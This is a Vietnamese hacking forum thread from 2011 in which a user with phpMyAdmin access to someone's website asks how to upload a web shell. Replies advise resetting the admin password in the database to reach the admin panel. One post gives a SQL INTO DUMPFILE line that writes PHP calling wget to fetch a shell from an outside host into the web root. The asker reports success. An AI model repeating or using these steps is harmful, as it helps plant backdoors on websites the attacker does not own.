banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập hỏi về upshell VIA phpmyadmin  XML
  [Question]   hỏi về upshell VIA phpmyadmin 23/12/2011 13:35:14 (+0700) | #1 | 251458
ni.online
Member

[Minus]    0    [Plus]
Joined: 12/08/2008 23:02:04
Messages: 3
Offline
[Profile] [PM]
e là newbie mới post bài lần đầu có gì sai mong các a bỏ qua

e có thể vào được phpmyadmin rùi site đó cho mình run SQL nhưng e không thể kiếm được path của nó để cho mình run
Làm sao mình có thể coi được phpmyadmin info của nó đối với phpMyAdmin - 2.11.4
[Up] [Print Copy]
  [Question]   hỏi về upshell VIA phpmyadmin 24/12/2011 20:56:31 (+0700) | #2 | 251488
chimung
Member

[Minus]    0    [Plus]
Joined: 23/10/2008 22:23:45
Messages: 24
Offline
[Profile] [PM]
Theo mình, bạn có thể upshell qua admin_page
+ Xem table của admin trong myphpadmin ==> edit lại pass để logi vào admin_page
+ Qua admin_page ta upshell lên thui (Cái này còn tuỳ thuộc vào code của site + khả năng bypass của bạn)
Chúc may mắn smilie
[Up] [Print Copy]
  [Question]   hỏi về upshell VIA phpmyadmin 25/12/2011 05:31:39 (+0700) | #3 | 251494
ni.online
Member

[Minus]    0    [Plus]
Joined: 12/08/2008 23:02:04
Messages: 3
Offline
[Profile] [PM]
cái file admin_page mình kiếm đau có thấy đâu bạn ???
ngoài ra còn có khả năng khác để mình upload shell kg bạn
[Up] [Print Copy]
  [Question]   hỏi về upshell VIA phpmyadmin 25/12/2011 13:40:55 (+0700) | #4 | 251501
kenshin19xx
Member

[Minus]    0    [Plus]
Joined: 09/11/2011 04:32:19
Messages: 18
Offline
[Profile] [PM]
có thể nếu như mysql user của bạn là root,theo đó bạn có thể
select “<? system(‘wget www.abc.com/shell.txt -O bar.php’); ?>” into dumpfile ‘/opt/lampp/htdocs/dvwa/bad.php’

hoặc select "nội dung shell" into dumpfile 'path/shell.php'
[Up] [Print Copy]
  [Question]   hỏi về upshell VIA phpmyadmin 25/12/2011 16:55:43 (+0700) | #5 | 251508
chimung
Member

[Minus]    0    [Plus]
Joined: 23/10/2008 22:23:45
Messages: 24
Offline
[Profile] [PM]

ni.online wrote:
cái file admin_page mình kiếm đau có thấy đâu bạn ???
ngoài ra còn có khả năng khác để mình upload shell kg bạn  

admin_page ở đây nghĩa là trang quản trị website, nơi mà admin login vào để sửa, xoá, thêm bài viết cho website
mình biết mỗi cách đó. Bạn thử thêm cách của kenshin19xx. Trường hợp có được myphpadmin của root thì mình chưa gặp bao giờ smilie
[Up] [Print Copy]
  [Question]   hỏi về upshell VIA phpmyadmin 26/12/2011 13:52:39 (+0700) | #6 | 251533
ni.online
Member

[Minus]    0    [Plus]
Joined: 12/08/2008 23:02:04
Messages: 3
Offline
[Profile] [PM]
thanks bạn mình đã làm được rùi
[Up] [Print Copy]
  [Question]   hỏi về upshell VIA phpmyadmin 26/12/2011 14:50:53 (+0700) | #7 | 251535
kenshin19xx
Member

[Minus]    0    [Plus]
Joined: 09/11/2011 04:32:19
Messages: 18
Offline
[Profile] [PM]
trường hợp MySql co quyền root thường là server riêng , còn đa số bây giờ là xài hosting (sử dụng cpanel,direct admin...) thì chỉ có quyền user
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|